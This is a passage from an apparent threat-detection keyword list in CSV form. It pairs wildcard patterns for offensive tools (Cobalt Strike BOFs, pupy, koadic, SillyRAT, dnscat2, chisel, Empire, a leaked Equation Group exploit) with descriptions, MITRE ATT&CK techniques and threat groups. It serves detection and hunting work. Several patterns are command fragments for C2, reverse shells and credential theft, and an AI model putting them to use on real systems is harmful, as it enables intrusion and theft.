- T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*send_shellcode_via_pipe*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*send_shellcode_via_pipe*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*Send-CalendarNTLMLeak *,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,0,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -*sendmail -osendmail chmod +x sendmail*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*sense2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*sensepost/goDoH*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*sensepost/reGeorg*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*sensepost/ruler*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*sensepost/wiresocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*sensitive_files_win.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Sensitivelocalfiles.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*senzee1984/micr0_shell*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*seriously_nothing_shady_here*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*serve_ps1_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Server enforces NLA; switching to 'fake server' mode*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*server*-relay.screenconnect.com*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*server.py generate --address * --port * --output * --source*,offensive_tool_keyword,SillyRAT,A Cross Platform multifunctional (Windows/Linux/Mac) RAT.,T1055.003 - T1027 - T1105 - T1005,TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/hash3liZer/SillyRAT,1,0,N/A,N/A,6,594,151,2023-06-23T18:49:43Z,2020-05-10T17:37:37Z -*server/modules/csharp/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*server@egress-asses.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*server=*port=53531*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*-server=http://127.0.0.1:4002*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z -*server-7566091c4e4a2a24.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*server-console.exe +*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*server-console.py --mifi-ip *,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*--server-port * --server-ip * --proxy-ip * --proxy-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*serverscan.linux.elf*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan.linux.so*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverScan.win.cna*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_386.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*_amd64*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Air_*_i386*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_air-probes.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*serverscan_amd64.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*.exe*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*_amd64*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*ServerScan_Pro_*_i386*,offensive_tool_keyword,cobaltstrike,ServerScan is 